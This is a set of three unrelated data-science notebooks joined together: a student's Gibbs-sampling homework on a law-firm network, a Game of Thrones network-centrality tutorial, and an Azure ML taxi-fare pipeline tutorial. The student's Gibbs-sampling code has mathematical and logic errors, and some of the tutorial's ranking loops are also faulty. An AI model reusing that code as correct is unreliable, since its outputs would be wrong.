We can draw the network with node coloring according to a selected attribute as follows:
```
nx.draw_kamada_kawai(lazega,with_labels=True,node_color=get_att_array(lazega,'observed_practice'))
```
We now want to predict the missing 'practice' labels using Gibbs sampling on a Markov network model. We will first need to initialize values for the unobserved attributes.
**Task 1:** complete the following function:
```
def init_practice():
...:
...: for i in range(len(get_att_array(lazega,'observed_practice'))):
...: if (np.isnan(get_att_array(lazega,'observed_practice')[i]))!=True:
...: #print(get_att_array(lazega,'observed_practice')[i])
...: lazega.add_node(node_atts.loc[i,'nodeID'], predicted_practice=get_att_array(lazega,'observed_practice')[i])
...: else:
...: #print("Hey")
...: lazega.add_node(node_atts.loc[i,'nodeID'], predicted_practice=random.randint(1,2))
...: print(get_att_array(lazega,'predicted_practice'))
...:
...: init_practice()
```
We next define some potential functions. Mostly we will be using node or edge potentials, i.e., potential functions that
depend only on the attributes of a single node, or on the attributes of two nodes (connected by an edge).
Instead of defining the potential function directly, it is more convenient to first define the log of the potential function. Then, instead of taking a big product, one can first take the sum of relevant potentials, and apply an exponential at the end (cf. slides 12, 20, and 23). E.g., the log of the homophily potential (slide 20) is w in the case A_i=A_j, and 0 otherwise. Also, all real numbers are then permissible return values, without the non-negativity condition.
The following are examples of a simple node (log-)potential and an "ising-style" homophily potential. Both potential functions depend on numerical parameters w1,w2. You may start with using these two log-potentials only, and later define additional potential functions.
```
def n_log_potential_1(n,w1,w2):
if n['predicted_practice'] == 1: return w1
else: return w2
def n_log_potential_2(n1,n2,w1,w2):
if n1['predicted_practice']==n2['predicted_practice']: return w1
else: return w2
def n_log_potential_3(n,w1,w2):
if n['predicted'] == 2: return w1
else: return w2
print(n_log_potential_1(lazega.nodes[4],-1,1))
print(n_log_potential_2(lazega.nodes[4],lazega.nodes[6],-2,3))
print(lazega.nodes[10])
```
**Task 2:** Write a Gibbs-sampling function for re-sampling the 'predicted_practice' attribute value for a node *n*. At this point we need not worry whether for *n* the actual 'practice' value is known or not.
```
import math
def gibbs_sample(n,w1,w2): #should be only n should use all neighbors, but aint working
node_potentials1 = []
node_potentials2 = []
edge_potentials = []
potential_1 = n_log_potential_1(n,w1,w2)
node_potentials1.append(potential_1)
potential_1 = n_log_potential_1(n,w1,w2)
node_potentials2.append(potential_1)
if np.isnan(n['predicted_practice']) != True:
neighbors = nx.all_neighbors(lazega,n['predicted_practice'])
for key in list(neighbors):
potential_2 = n_log_potential_2(n,lazega.nodes[key],w1,w2)
edge_potentials.append(potential_2)
nodes_sum1 = sum(node_potentials1)
nodes_sum2 = sum(node_potentials2)
edges_sum = sum(edge_potentials)
exp_sum1 = math.exp(0.5*(edges_sum+nodes_sum1))
exp_sum2 = math.exp(0.5*(edges_sum+nodes_sum2))
new_probability=(exp_sum1/exp_sum1+exp_sum2)/100
print(new_probability)
if random.uniform(0, 1) > new_probability:
n['predicted_practice'] = 2
else:
n['predicted_practice']= 1
#print(n['predicted_practice'])
return n['predicted_practice']
gibbs_sample(lazega.nodes[4],-1,1)
# Iterate over all log-potential functions you want to use
# For node potentials, evaluate the potential for the given node n
# For edge potentials, evaluate the potential for all pairs (n,n') where n' is a neighbor in the 'friendship' graph.
#
# Since the friendship graph is directed, there are three possibilities of how to do this precisely:
# - consider all n' where friends(n,n')
# - consider all n' where friends(n',n)
# - consider both cases of n'
#
# The method nx.all_neighbors(lazega,n) will return an iterator over both types of neighbors of n, so the third
# option is the most convenient to use (and maybe also the most sensible)
#
# Sum the values of all the potential functions, and take the exponential.
# This has to be done for both possible values of the 'predicted_practice' value for n
#
# You will probably need to add arguments to the gibbs_sample method for the numerical parameters of
# the potential functions that you are using.
#
# Calculate the probability for predicted_practice(n) according to the quotient shown on slide 12 (see also slide 23)
#
# Set the new value of predicted_practice(n) randomly according to the probabilities you have just computed.
```
Once the resampling of the predicted_practice attribute for a single node is in place, the rest is quite straightforward:
**Task 3**: Write a function that performs one round of Gibbs sampling, i.e., re-samples the predicted values for all nodes for which the class attribute is unknown.
```
def gibbs_one_round(G):
for i in G.nodes():
if (np.isnan(lazega.nodes[i]['observed_practice'])):
#print(lazega.nodes[i]['observed_practice'])
lazega.nodes[i]['observed_practice'] = gibbs_sample(lazega.nodes[i],-1,1)
#print(lazega.nodes[i]['observed_practice'])
#print(prediction)
return get_att_array(lazega,'observed_practice')
gibbs_one_round(lazega)
```
Now we can put everything together to use our model to predict the 'practice' attribute.
**Task 4**: write code for doing the following:
```
count_1= 0
count_2= 0
#values=[]
burn_in = 500
for j in range(1000):
value = gibbs_one_round(lazega)
if j>burn_in:
break
print(value)
nr_diff_values = 0
for i in range(node_atts.shape[0]):
if value[i] != get_att_array(lazega,'true_practice')[i]:
nr_diff_values +=1
accuracy = ((len(lazega.nodes())-nr_diff_values)/len(lazega.nodes()))*100
print(accuracy)
# Perform a number of gibbs_one_round(lazega) sampling steps
#
# (Maybe after a certain number of burn-in iterations): keep count of how often the predicted_practice value of nodes
# with observed_practice == nan is in the two states 1 or 2.
#
# Predict the unobserved practice values as the more probably state in the Gibbs sample
#
# Compare your predicted values against the true values
```
Now that things are up and running, we can explore some of the properties of the model and the Gibbs sampling procedure:
**Task 5**:
<ul>
<li> Perform the Gibbs-prediction procedure several times and explore how stable the prediction results are. Apart from the final categorical prediction, you can also consider the actual frequencies of the two 'predicted_practice" states in your samples</li>
<li> Try different settings of the parameter values of the potential functions. Can you find a relationship between the parameter values, and the stability of the Gibbs sampling? </li>
<li> Also try different parameter settings in order to optimize prediction accuracy. In a real application, one would learn the parameter values by likelihood optimization based on the labeled training nodes. This is outside the scope of what we can do here, so let's do a simple grid search over parameter values instead (ugly!) and evaluate by checking accuracy using the known actual labels for the test nodes (knowing that -- in principle -- this is forbidden!).
</ul>
```
##run it several times and note the results
##
```
| github_jupyter |
##### Let's change gears and talk about Game of thrones or shall I say Network of Thrones.
It is suprising right? What is the relationship between a fatansy TV show/novel and network science or python(it's not related to a dragon).

Andrew J. Beveridge, an associate professor of mathematics at Macalester College, and Jie Shan, an undergraduate created a network from the book A Storm of Swords by extracting relationships between characters to find out the most important characters in the book(or GoT).
The dataset is publicly available for the 5 books at https://github.com/mathbeveridge/asoiaf. This is an interaction network and were created by connecting two characters whenever their names (or nicknames) appeared within 15 words of one another in one of the books. The edge weight corresponds to the number of interactions.
Credits:
Blog: https://networkofthrones.wordpress.com
Math Horizons Article: https://www.maa.org/sites/default/files/pdf/Mathhorizons/NetworkofThrones%20%281%29.pdf
```
import pandas as pd
import networkx as nx
import matplotlib.pyplot as plt
import community
import warnings
warnings.filterwarnings('ignore')
%matplotlib inline
book1 = pd.read_csv('data/asoiaf-book1-edges.csv')
book2 = pd.read_csv('data/asoiaf-book2-edges.csv')
book3 = pd.read_csv('data/asoiaf-book3-edges.csv')
book4 = pd.read_csv('data/asoiaf-book4-edges.csv')
book5 = pd.read_csv('data/asoiaf-book5-edges.csv')
G_book1 = nx.Graph()
G_book2 = nx.Graph()
G_book3 = nx.Graph()
G_book4 = nx.Graph()
G_book5 = nx.Graph()
for row in book1.iterrows():
G_book1.add_edge(row[1]['Source'], row[1]['Target'], weight=row[1]['weight'], book=row[1]['book'])
for row in book2.iterrows():
G_book2.add_edge(row[1]['Source'], row[1]['Target'], weight=row[1]['weight'], book=row[1]['book'])
for row in book3.iterrows():
G_book3.add_edge(row[1]['Source'], row[1]['Target'], weight=row[1]['weight'], book=row[1]['book'])
for row in book4.iterrows():
G_book4.add_edge(row[1]['Source'], row[1]['Target'], weight=row[1]['weight'], book=row[1]['book'])
for row in book5.iterrows():
G_book5.add_edge(row[1]['Source'], row[1]['Target'], weight=row[1]['weight'], book=row[1]['book'])
G_book1.edges(data=True)
```
### Finding the most important node i.e character in these networks.
We'll compare different centralities to find the importance of nodes in this network. There is no one right way of calaculating it, every approach has a different meaning. Let's start with degree centrality which is defined by degree of a node divided by a noramlising factor n-1 where n is the number of nodes.
```
list(G_book1.neighbors('Jaime-Lannister'))
```
##### nx.degree_centrality(graph) returns a dictionary where keys are the nodes and values are the corresponsing degree centrality. Let's find the five most important character according to degree centrality.
```
sorted(nx.degree_centrality(G_book1).items(), key=lambda x:x[1], reverse=True)[0:10]
# Plot a histogram of degree centrality
plt.hist(list(nx.degree_centrality(G_book4).values()))
plt.show()
```
### Exercise
Create a new centrality measure, weighted_degree_centrality(Graph, weight) which takes in Graph and the weight attribute and returns a weighted degree centrality dictionary. Weighted degree is calculated by summing the weight of the all edges of a node and normalise(divide) the weighted degree by the total weight of the graph(sum of weighted degrees of all nodes) and find the top five characters according to this measure.
```
def weighted_degree_centrality(G, weight):
result = dict()
total = 0
for node in G.nodes():
weight_degree = 0
for n in G.edges([node], data=True):
weight_degree += n[2]['weight']
result[node] = weight_degree
total += weight_degree
for node, value in result.items():
result[node] = value/total
return result
plt.hist(list(weighted_degree_centrality(G_book1, 'weight').values()))
plt.show()
sorted(weighted_degree_centrality(G_book1, 'weight').items(), key=lambda x:x[1], reverse=True)[0:10]
sum(list(weighted_degree_centrality(G_book1, 'weight').values()))
```
##### Betweeness centrality
From Wikipedia:
For every pair of vertices in a connected graph, there exists at least one shortest path between the vertices such that either the number of edges that the path passes through (for unweighted graphs) or the sum of the weights of the edges (for weighted graphs) is minimized. The betweenness centrality for each vertex is the number of these shortest paths that pass through the vertex.
```
# unweighted
sorted(nx.betweenness_centrality(G_book1).items(), key=lambda x:x[1], reverse=True)[0:10]
sorted(nx.betweenness_centrality(G_book1, weight='weight').items(), key=lambda x:x[1], reverse=True)[0:10]
```
#### PageRank
The billion dollar algorithm, PageRank works by counting the number and quality of links to a page to determine a rough estimate of how important the website is. The underlying assumption is that more important websites are likely to receive more links from other websites.
```
# by default weight attribute in pagerank is weight, so we use weight=None to find the unweighted results
sorted(nx.pagerank_numpy(G_book1, weight=None).items(), key=lambda x:x[1], reverse=True)[0:10]
sorted(nx.pagerank_numpy(G_book1, weight='weight').items(), key=lambda x:x[1], reverse=True)[0:10]
```
### Is there a correlation between these techniques?
#### Exercise
Find the correlation between these three techniques.
```
cor = pd.DataFrame.from_records([nx.pagerank_numpy(G_book1, weight='weight'), nx.betweenness_centrality(G_book1, weight='weight'), weighted_degree_centrality(G_book1, 'weight')])
cor.T
```
#### What can we infer from this correlation matrix between these three methods?
```
cor.T.corr()
```
Till now we have been analysing only the first book, but what about the other 4 books? We can now look at the evolution of this character interaction network that adds temporality to this network.
```
evol = [weighted_degree_centrality(graph, 'weight') for graph in [G_book1, G_book2, G_book3, G_book4, G_book5]]
evol_df = pd.DataFrame.from_records(evol).fillna(0)
evol_df
pd.DataFrame.from_records(evol).max(axis=0).sort_values(ascending=False)[0:10]
```
##### Exercise
Plot the evolution of weighted degree centrality of the above mentioned characters over the 5 books, and repeat the same exercise for betweenness centrality.
```
evol_df[list(pd.DataFrame.from_records(evol).max(axis=0).sort_values(ascending=False)[0:10].index)].plot(figsize=(14,10))
plt.show()
evol = [nx.betweenness_centrality(graph, weight='weight') for graph in [G_book1, G_book2, G_book3, G_book4, G_book5]]
evol_df = pd.DataFrame.from_records(evol).fillna(0)
evol_df[list(pd.DataFrame.from_records(evol).max(axis=0).sort_values(ascending=False)[0:10].index)].plot(figsize=(14,10))
plt.show()
```
Where is Stannis Baratheon in degree centrality measure? Not even in top 10. Strange?
#### Communitty detection in Networks
A network is said to have community structure if the nodes of the network can be easily grouped into (potentially overlapping) sets of nodes such that each set of nodes is densely connected internally.
We will use louvain community detection algorithm to find the modules in our graph.
```
partition = community.best_partition(G_book1)
size = float(len(set(partition.values())))
pos = nx.spring_layout(G_book1)
count = 0.
for com in set(partition.values()) :
count = count + 1.
list_nodes = [nodes for nodes in partition.keys()
if partition[nodes] == com]
nx.draw_networkx_nodes(G_book1, pos, list_nodes, node_size = 20,
node_color = str(count / size))
nx.draw_networkx_edges(G_book1, pos, alpha=0.5)
plt.show()
d = {}
for character, par in partition.items():
if par in d:
d[par].append(character)
else:
d[par] = [character]
d
nx.draw(nx.subgraph(G_book1, d[1]))
nx.density(G_book1)
nx.density(nx.subgraph(G_book1, d[1]))
nx.density(nx.subgraph(G_book1, d[1]))/nx.density(G_book1)
```
#### Exercise
Find the most important node in the partitions according to pagerank, degree centrality and betweenness centrality of the nodes.
```
max_d = {}
page = nx.pagerank(G_book1)
for par in d:
temp = 0
for chars in d[par]:
if page[chars] > temp:
max_d[par] = chars
max_d
max_d = {}
page = nx.betweenness_centrality(G_book1)
for par in d:
temp = 0
for chars in d[par]:
if page[chars] > temp:
max_d[par] = chars
max_d
max_d = {}
page = nx.degree_centrality(G_book1)
for par in d:
temp = 0
for chars in d[par]:
if page[chars] > temp:
max_d[par] = chars
max_d
d[8]
```
| github_jupyter |
Copyright (c) Microsoft Corporation. All rights reserved.
Licensed under the MIT License.

# NYC Taxi Data Regression Model
This is an [Azure Machine Learning Pipelines](https://aka.ms/aml-pipelines) version of two-part tutorial ([Part 1](https://docs.microsoft.com/en-us/azure/machine-learning/service/tutorial-data-prep), [Part 2](https://docs.microsoft.com/en-us/azure/machine-learning/service/tutorial-auto-train-models)) available for Azure Machine Learning.
You can combine the two part tutorial into one using AzureML Pipelines as Pipelines provide a way to stitch together various steps involved (like data preparation and training in this case) in a machine learning workflow.
In this notebook, you learn how to prepare data for regression modeling by using open source library [pandas](https://pandas.pydata.org/). You run various transformations to filter and combine two different NYC taxi datasets. Once you prepare the NYC taxi data for regression modeling, then you will use [AutoMLStep](https://docs.microsoft.com/python/api/azureml-train-automl-runtime/azureml.train.automl.runtime.automl_step.automlstep?view=azure-ml-py) available with [Azure Machine Learning Pipelines](https://aka.ms/aml-pipelines) to define your machine learning goals and constraints as well as to launch the automated machine learning process. The automated machine learning technique iterates over many combinations of algorithms and hyperparameters until it finds the best model based on your criterion.
After you complete building the model, you can predict the cost of a taxi trip by training a model on data features. These features include the pickup day and time, the number of passengers, and the pickup location.
## Prerequisite
If you are using an Azure Machine Learning Notebook VM, you are all set. Otherwise, make sure you go through the configuration Notebook located at https://github.com/Azure/MachineLearningNotebooks first if you haven't. This sets you up with a working config file that has information on your workspace, subscription id, etc.
## Prepare data for regression modeling
First, we will prepare data for regression modeling. We will leverage the convenience of Azure Open Datasets along with the power of Azure Machine Learning service to create a regression model to predict NYC taxi fare prices. Perform `pip install azureml-opendatasets` to get the open dataset package. The Open Datasets package contains a class representing each data source (NycTlcGreen and NycTlcYellow) to easily filter date parameters before downloading.
### Load data
Begin by creating a dataframe to hold the taxi data. When working in a non-Spark environment, Open Datasets only allows downloading one month of data at a time with certain classes to avoid MemoryError with large datasets. To download a year of taxi data, iteratively fetch one month at a time, and before appending it to green_df_raw, randomly sample 500 records from each month to avoid bloating the dataframe. Then preview the data. To keep this process short, we are sampling data of only 1 month.
Note: Open Datasets has mirroring classes for working in Spark environments where data size and memory aren't a concern.
```
import azureml.core
# Check core SDK version number
print("SDK version:", azureml.core.VERSION)
from azureml.opendatasets import NycTlcGreen, NycTlcYellow
import pandas as pd
from datetime import datetime
from dateutil.relativedelta import relativedelta
green_df_raw = pd.DataFrame([])
start = datetime.strptime("1/1/2016","%m/%d/%Y")
end = datetime.strptime("1/31/2016","%m/%d/%Y")
number_of_months = 1
sample_size = 5000
for sample_month in range(number_of_months):
temp_df_green = NycTlcGreen(start + relativedelta(months=sample_month), end + relativedelta(months=sample_month)) \
.to_pandas_dataframe()
green_df_raw = green_df_raw.append(temp_df_green.sample(sample_size))
yellow_df_raw = pd.DataFrame([])
start = datetime.strptime("1/1/2016","%m/%d/%Y")
end = datetime.strptime("1/31/2016","%m/%d/%Y")
sample_size = 500
for sample_month in range(number_of_months):
temp_df_yellow = NycTlcYellow(start + relativedelta(months=sample_month), end + relativedelta(months=sample_month)) \
.to_pandas_dataframe()
yellow_df_raw = yellow_df_raw.append(temp_df_yellow.sample(sample_size))
```
### See the data
```
from IPython.display import display
display(green_df_raw.head(5))
display(yellow_df_raw.head(5))
```
### Download data locally and then upload to Azure Blob
This is a one-time process to save the dave in the default datastore.
```
import os
dataDir = "data"
if not os.path.exists(dataDir):
os.mkdir(dataDir)
greenDir = dataDir + "/green"
yelloDir = dataDir + "/yellow"
if not os.path.exists(greenDir):
os.mkdir(greenDir)
if not os.path.exists(yelloDir):
os.mkdir(yelloDir)
greenTaxiData = greenDir + "/unprepared.parquet"
yellowTaxiData = yelloDir + "/unprepared.parquet"
green_df_raw.to_csv(greenTaxiData, index=False)
yellow_df_raw.to_csv(yellowTaxiData, index=False)
print("Data written to local folder.")
from azureml.core import Workspace
ws = Workspace.from_config()
print("Workspace: " + ws.name, "Region: " + ws.location, sep = '\n')
# Default datastore
default_store = ws.get_default_datastore()
default_store.upload_files([greenTaxiData],
target_path = 'green',
overwrite = True,
show_progress = True)
default_store.upload_files([yellowTaxiData],
target_path = 'yellow',
overwrite = True,
show_progress = True)
print("Upload calls completed.")
```
### Create and register datasets
By creating a dataset, you create a reference to the data source location. If you applied any subsetting transformations to the dataset, they will be stored in the dataset as well. You can learn more about the what subsetting capabilities are supported by referring to [our documentation](https://docs.microsoft.com/en-us/python/api/azureml-core/azureml.data.tabular_dataset.tabulardataset?view=azure-ml-py#remarks). The data remains in its existing location, so no extra storage cost is incurred.
```
from azureml.core import Dataset
green_taxi_data = Dataset.Tabular.from_delimited_files(default_store.path('green/unprepared.parquet'))
yellow_taxi_data = Dataset.Tabular.from_delimited_files(default_store.path('yellow/unprepared.parquet'))
```
Register the taxi datasets with the workspace so that you can reuse them in other experiments or share with your colleagues who have access to your workspace.
```
green_taxi_data = green_taxi_data.register(ws, 'green_taxi_data')
yellow_taxi_data = yellow_taxi_data.register(ws, 'yellow_taxi_data')
```
### Setup Compute
#### Create new or use an existing compute
> Note that if you have an AzureML Data Scientist role, you will not have permission to create compute resources. Talk to your workspace or IT admin to create the compute targets described in this section, if they do not already exist.
```
from azureml.core.compute import ComputeTarget, AmlCompute
from azureml.core.compute_target import ComputeTargetException
# Choose a name for your CPU cluster
amlcompute_cluster_name = "cpu-cluster"
# Verify that cluster does not exist already
try:
aml_compute = ComputeTarget(workspace=ws, name=amlcompute_cluster_name)
print('Found existing cluster, use it.')
except ComputeTargetException:
compute_config = AmlCompute.provisioning_configuration(vm_size='STANDARD_D2_V2',
max_nodes=4)
aml_compute = ComputeTarget.create(ws, amlcompute_cluster_name, compute_config)
aml_compute.wait_for_completion(show_output=True)
```
#### Define RunConfig for the compute
We will also use `pandas`, `scikit-learn` and `automl`, `pyarrow` for the pipeline steps. Defining the `runconfig` for that.
```
from azureml.core.runconfig import RunConfiguration
from azureml.core.conda_dependencies import CondaDependencies
# Create a new runconfig object
aml_run_config = RunConfiguration()
# Use the aml_compute you created above.
aml_run_config.target = aml_compute
# Enable Docker
aml_run_config.environment.docker.enabled = True
# Use conda_dependencies.yml to create a conda environment in the Docker image for execution
aml_run_config.environment.python.user_managed_dependencies = False
# Specify CondaDependencies obj, add necessary packages
aml_run_config.environment.python.conda_dependencies = CondaDependencies.create(
conda_packages=['pandas','scikit-learn'],
pip_packages=['azureml-sdk[automl]', 'pyarrow'])
print ("Run configuration created.")
```
### Prepare data
Now we will prepare for regression modeling by using `pandas`. We run various transformations to filter and combine two different NYC taxi datasets.
We achieve this by creating a separate step for each transformation as this allows us to reuse the steps and saves us from running all over again in case of any change. We will keep data preparation scripts in one subfolder and training scripts in another.
> The best practice is to use separate folders for scripts and its dependent files for each step and specify that folder as the `source_directory` for the step. This helps reduce the size of the snapshot created for the step (only the specific folder is snapshotted). Since changes in any files in the `source_directory` would trigger a re-upload of the snapshot, this helps keep the reuse of the step when there are no changes in the `source_directory` of the step.
#### Define Useful Columns
Here we are defining a set of "useful" columns for both Green and Yellow taxi data.
```
display(green_df_raw.columns)
display(yellow_df_raw.columns)
# useful columns needed for the Azure Machine Learning NYC Taxi tutorial
useful_columns = str(["cost", "distance", "dropoff_datetime", "dropoff_latitude",
"dropoff_longitude", "passengers", "pickup_datetime",
"pickup_latitude", "pickup_longitude", "store_forward", "vendor"]).replace(",", ";")
print("Useful columns defined.")
```
#### Cleanse Green taxi data
```
from azureml.pipeline.core import PipelineData
from azureml.pipeline.steps import PythonScriptStep
# python scripts folder
prepare_data_folder = './scripts/prepdata'
# rename columns as per Azure Machine Learning NYC Taxi tutorial
green_columns = str({
"vendorID": "vendor",
"lpepPickupDatetime": "pickup_datetime",
"lpepDropoffDatetime": "dropoff_datetime",
"storeAndFwdFlag": "store_forward",
"pickupLongitude": "pickup_longitude",
"pickupLatitude": "pickup_latitude",
"dropoffLongitude": "dropoff_longitude",
"dropoffLatitude": "dropoff_latitude",
"passengerCount": "passengers",
"fareAmount": "cost",
"tripDistance": "distance"
}).replace(",", ";")
# Define output after cleansing step
cleansed_green_data = PipelineData("cleansed_green_data", datastore=default_store).as_dataset()
print('Cleanse script is in {}.'.format(os.path.realpath(prepare_data_folder)))
# cleansing step creation
# See the cleanse.py for details about input and output
cleansingStepGreen = PythonScriptStep(
name="Cleanse Green Taxi Data",
script_name="cleanse.py",
arguments=["--useful_columns", useful_columns,
"--columns", green_columns,
"--output_cleanse", cleansed_green_data],
inputs=[green_taxi_data.as_named_input('raw_data')],
outputs=[cleansed_green_data],
compute_target=aml_compute,
runconfig=aml_run_config,
source_directory=prepare_data_folder,
allow_reuse=True
)
print("cleansingStepGreen created.")
```
#### Cleanse Yellow taxi data
```
yellow_columns = str({
"vendorID": "vendor",
"tpepPickupDateTime": "pickup_datetime",
"tpepDropoffDateTime": "dropoff_datetime",
"storeAndFwdFlag": "store_forward",
"startLon": "pickup_longitude",
"startLat": "pickup_latitude",
"endLon": "dropoff_longitude",
"endLat": "dropoff_latitude",
"passengerCount": "passengers",
"fareAmount": "cost",
"tripDistance": "distance"
}).replace(",", ";")
# Define output after cleansing step
cleansed_yellow_data = PipelineData("cleansed_yellow_data", datastore=default_store).as_dataset()
print('Cleanse script is in {}.'.format(os.path.realpath(prepare_data_folder)))
# cleansing step creation
# See the cleanse.py for details about input and output
cleansingStepYellow = PythonScriptStep(
name="Cleanse Yellow Taxi Data",
script_name="cleanse.py",
arguments=["--useful_columns", useful_columns,
"--columns", yellow_columns,
"--output_cleanse", cleansed_yellow_data],
inputs=[yellow_taxi_data.as_named_input('raw_data')],
outputs=[cleansed_yellow_data],
compute_target=aml_compute,
runconfig=aml_run_config,
source_directory=prepare_data_folder,
allow_reuse=True
)
print("cleansingStepYellow created.")
```
#### Merge cleansed Green and Yellow datasets
We are creating a single data source by merging the cleansed versions of Green and Yellow taxi data.
```
# Define output after merging step
merged_data = PipelineData("merged_data", datastore=default_store).as_dataset()
print('Merge script is in {}.'.format(os.path.realpath(prepare_data_folder)))
# merging step creation
# See the merge.py for details about input and output
mergingStep = PythonScriptStep(
name="Merge Taxi Data",
script_name="merge.py",
arguments=["--output_merge", merged_data],
inputs=[cleansed_green_data.parse_parquet_files(),
cleansed_yellow_data.parse_parquet_files()],
outputs=[merged_data],
compute_target=aml_compute,
runconfig=aml_run_config,
source_directory=prepare_data_folder,
allow_reuse=True
)
print("mergingStep created.")
```
#### Filter data
This step filters out coordinates for locations that are outside the city border. We use a TypeConverter object to change the latitude and longitude fields to decimal type.
```
# Define output after merging step
filtered_data = PipelineData("filtered_data", datastore=default_store).as_dataset()
print('Filter script is in {}.'.format(os.path.realpath(prepare_data_folder)))
# filter step creation
# See the filter.py for details about input and output
filterStep = PythonScriptStep(
name="Filter Taxi Data",
script_name="filter.py",
arguments=["--output_filter", filtered_data],
inputs=[merged_data.parse_parquet_files()],
outputs=[filtered_data],
compute_target=aml_compute,
runconfig = aml_run_config,
source_directory=prepare_data_folder,
allow_reuse=True
)
print("FilterStep created.")
```
#### Normalize data
In this step, we split the pickup and dropoff datetime values into the respective date and time columns and then we rename the columns to use meaningful names.
```
# Define output after normalize step
normalized_data = PipelineData("normalized_data", datastore=default_store).as_dataset()
print('Normalize script is in {}.'.format(os.path.realpath(prepare_data_folder)))
# normalize step creation
# See the normalize.py for details about input and output
normalizeStep = PythonScriptStep(
name="Normalize Taxi Data",
script_name="normalize.py",
arguments=["--output_normalize", normalized_data],
inputs=[filtered_data.parse_parquet_files()],
outputs=[normalized_data],
compute_target=aml_compute,
runconfig = aml_run_config,
source_directory=prepare_data_folder,
allow_reuse=True
)
print("normalizeStep created.")
```
#### Transform data
Transform the normalized taxi data to final required format. This steps does the following:
- Split the pickup and dropoff date further into the day of the week, day of the month, and month values.
- To get the day of the week value, uses the derive_column_by_example() function. The function takes an array parameter of example objects that define the input data, and the preferred output. The function automatically determines the preferred transformation. For the pickup and dropoff time columns, split the time into the hour, minute, and second by using the split_column_by_example() function with no example parameter.
- After new features are generated, use the drop_columns() function to delete the original fields as the newly generated features are preferred.
- Rename the rest of the fields to use meaningful descriptions.
```
# Define output after transform step
transformed_data = PipelineData("transformed_data", datastore=default_store).as_dataset()
print('Transform script is in {}.'.format(os.path.realpath(prepare_data_folder)))
# transform step creation
# See the transform.py for details about input and output
transformStep = PythonScriptStep(
name="Transform Taxi Data",
script_name="transform.py",
arguments=["--output_transform", transformed_data],
inputs=[normalized_data.parse_parquet_files()],
outputs=[transformed_data],
compute_target=aml_compute,
runconfig = aml_run_config,
source_directory=prepare_data_folder,
allow_reuse=True
)
print("transformStep created.")
```
### Split the data into train and test sets
This function segregates the data into dataset for model training and dataset for testing.
```
train_model_folder = './scripts/trainmodel'
# train and test splits output
output_split_train = PipelineData("output_split_train", datastore=default_store).as_dataset()
output_split_test = PipelineData("output_split_test", datastore=default_store).as_dataset()
print('Data spilt script is in {}.'.format(os.path.realpath(train_model_folder)))
# test train split step creation
# See the train_test_split.py for details about input and output
testTrainSplitStep = PythonScriptStep(
name="Train Test Data Split",
script_name="train_test_split.py",
arguments=["--output_split_train", output_split_train,
"--output_split_test", output_split_test],
inputs=[transformed_data.parse_parquet_files()],
outputs=[output_split_train, output_split_test],
compute_target=aml_compute,
runconfig = aml_run_config,
source_directory=train_model_folder,
allow_reuse=True
)
print("testTrainSplitStep created.")
```
## Use automated machine learning to build regression model
Now we will use **automated machine learning** to build the regression model. We will use [AutoMLStep](https://docs.microsoft.com/python/api/azureml-train-automl-runtime/azureml.train.automl.runtime.automl_step.automlstep?view=azure-ml-py) in AML Pipelines for this part. Perform `pip install azureml-sdk[automl]`to get the automated machine learning package. These functions use various features from the data set and allow an automated model to build relationships between the features and the price of a taxi trip.
### Automatically train a model
#### Create experiment
```
from azureml.core import Experiment
experiment = Experiment(ws, 'NYCTaxi_Tutorial_Pipelines')
print("Experiment created")
```
#### Define settings for autogeneration and tuning
Here we define the experiment parameter and model settings for autogeneration and tuning. We can specify automl_settings as **kwargs as well.
Use your defined training settings as a parameter to an `AutoMLConfig` object. Additionally, specify your training data and the type of model, which is `regression` in this case.
Note: When using AmlCompute, we can't pass Numpy arrays directly to the fit method.
```
from azureml.train.automl import AutoMLConfig
# Change iterations to a reasonable number (50) to get better accuracy
automl_settings = {
"iteration_timeout_minutes" : 10,
"iterations" : 2,
"primary_metric" : 'spearman_correlation',
"n_cross_validations": 5
}
training_dataset = output_split_train.parse_parquet_files().keep_columns(['pickup_weekday','pickup_hour', 'distance','passengers', 'vendor', 'cost'])
automl_config = AutoMLConfig(task = 'regression',
debug_log = 'automated_ml_errors.log',
path = train_model_folder,
compute_target = aml_compute,
featurization = 'auto',
training_data = training_dataset,
label_column_name = 'cost',
**automl_settings)
print("AutoML config created.")
```
#### Define AutoMLStep
```
from azureml.pipeline.steps import AutoMLStep
trainWithAutomlStep = AutoMLStep(name='AutoML_Regression',
automl_config=automl_config,
allow_reuse=True)
print("trainWithAutomlStep created.")
```
#### Build and run the pipeline
```
from azureml.pipeline.core import Pipeline
from azureml.widgets import RunDetails
pipeline_steps = [trainWithAutomlStep]
pipeline = Pipeline(workspace = ws, steps=pipeline_steps)
print("Pipeline is built.")
pipeline_run = experiment.submit(pipeline, regenerate_outputs=False)
print("Pipeline submitted for execution.")
RunDetails(pipeline_run).show()
```
### Explore the results
```
# Before we proceed we need to wait for the run to complete.
pipeline_run.wait_for_completion(show_output=False)
# functions to download output to local and fetch as dataframe
def get_download_path(download_path, output_name):
output_folder = os.listdir(download_path + '/azureml')[0]
path = download_path + '/azureml/' + output_folder + '/' + output_name
return path
def fetch_df(current_step, output_name):
output_data = current_step.get_output_data(output_name)
download_path = './outputs/' + output_name
output_data.download(download_path, overwrite=True)
df_path = get_download_path(download_path, output_name) + '/processed.parquet'
return pd.read_parquet(df_path)
```
#### View cleansed taxi data
```
green_cleanse_step = pipeline_run.find_step_run(cleansingStepGreen.name)[0]
yellow_cleanse_step = pipeline_run.find_step_run(cleansingStepYellow.name)[0]
cleansed_green_df = fetch_df(green_cleanse_step, cleansed_green_data.name)
cleansed_yellow_df = fetch_df(yellow_cleanse_step, cleansed_yellow_data.name)
display(cleansed_green_df.head(5))
display(cleansed_yellow_df.head(5))
```
#### View the combined taxi data profile
```
merge_step = pipeline_run.find_step_run(mergingStep.name)[0]
combined_df = fetch_df(merge_step, merged_data.name)
display(combined_df.describe())
```
#### View the filtered taxi data profile
```
filter_step = pipeline_run.find_step_run(filterStep.name)[0]
filtered_df = fetch_df(filter_step, filtered_data.name)
display(filtered_df.describe())
```
#### View normalized taxi data
```
normalize_step = pipeline_run.find_step_run(normalizeStep.name)[0]
normalized_df = fetch_df(normalize_step, normalized_data.name)
display(normalized_df.head(5))
```
#### View transformed taxi data
```
transform_step = pipeline_run.find_step_run(transformStep.name)[0]
transformed_df = fetch_df(transform_step, transformed_data.name)
display(transformed_df.describe())
display(transformed_df.head(5))
```
#### View training data used by AutoML
```
split_step = pipeline_run.find_step_run(testTrainSplitStep.name)[0]
train_split = fetch_df(split_step, output_split_train.name)
display(train_split.describe())
display(train_split.head(5))
```
#### View the details of the AutoML run
```
